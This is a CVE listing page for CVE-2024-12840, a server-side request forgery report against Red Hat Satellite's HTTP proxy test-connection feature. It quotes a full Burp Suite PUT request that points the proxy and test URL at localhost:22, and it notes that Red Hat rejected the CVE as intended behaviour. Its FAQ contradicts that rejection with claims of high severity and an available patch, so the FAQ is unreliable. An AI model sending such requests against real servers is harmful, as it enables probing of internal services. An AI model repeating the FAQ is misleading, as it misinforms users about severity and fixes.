CVE-2024-12840: Http proxies: satellite: service side request forgery in http proxies
Rejected reason: Red Hat Product Security has come to the conclusion that this CVE is not needed. The problem described was inteded behavior and therefore not a bug.
Other sources
ssrf in https://vulnerableserver.com/httpproxies/testconnection Affected parameters: httpproxy[url] testur
• Fill the values and Capture the request with BurpSuite • In the Repeater tab change the parameter values httpproxy[url] and/or testurl for: http://localhost:22 By default the SSH (22) port is not open: HTTP Request: PUT /httpproxies/testconnection HTTP/2 Host: vulnerableserver.com Cookie: timezone=Europe%2FAmsterdam; sessionid=70c6c0638ec6aad4bd733570fd807267 Content-Length: 381 Sec-Ch-Ua-Platform: "Windows" X-Csrf-Token: DQmNtiYbhAdFABfamR7mZy7WhruFtY2jjAWrtRPGu5PqmaJwrsCB9Y7hqQZmsCaqNv1VN2aDsxeBBSsgpA478g Accept-Language: en-GB,en;q=0.9 Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36 Accept: / Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://vulnerableserver.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://vulnerableserver.com/httpproxies/new Accept-Encoding: gzip, deflate, br Priority: u=1, i authenticitytoken=DQmNtiYbhAdFABfamR7mZy7WhruFtY2jjAWrtRPGu5PqmaJwrsCB9Y7hqQZmsCaqNv1VN2aDsxeBBSsgpA478g&httpproxy%5B name%5D=test&httpproxy%5Burl%5D=http://localhost:22&httpproxy%5Busername%5D=&fakepassword=&httpproxy%5Bcacert%5D=&te sturl=http://localhost:22&httpproxy%5Blocationids%5D%5B%5D=&httpproxy%5Borganizationids%5D%5B%5D=&httpproxy%5Borg anizationids%5D%5B%5D=1
— Red Hat
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2024-12840?
CVE-2024-12840 is classified as a high severity vulnerability due to its potential exploitation for server-side request forgery.
How do I fix CVE-2024-12840?
To fix CVE-2024-12840, ensure you are running the latest patched version of Red Hat Satellite that addresses this vulnerability.
How can CVE-2024-12840 be exploited?
CVE-2024-12840 can be exploited by sending a PUT HTTP request to /http_proxies/test_connection with the http_proxies variable set to localhost.
What software is affected by CVE-2024-12840?
CVE-2024-12840 affects Red Hat Satellite, specifically versions that do not have the mitigation applied.
What impact does CVE-2024-12840 have on security?
CVE-2024-12840 can lead to unauthorized access to sensitive information from the localhost of the vulnerable server.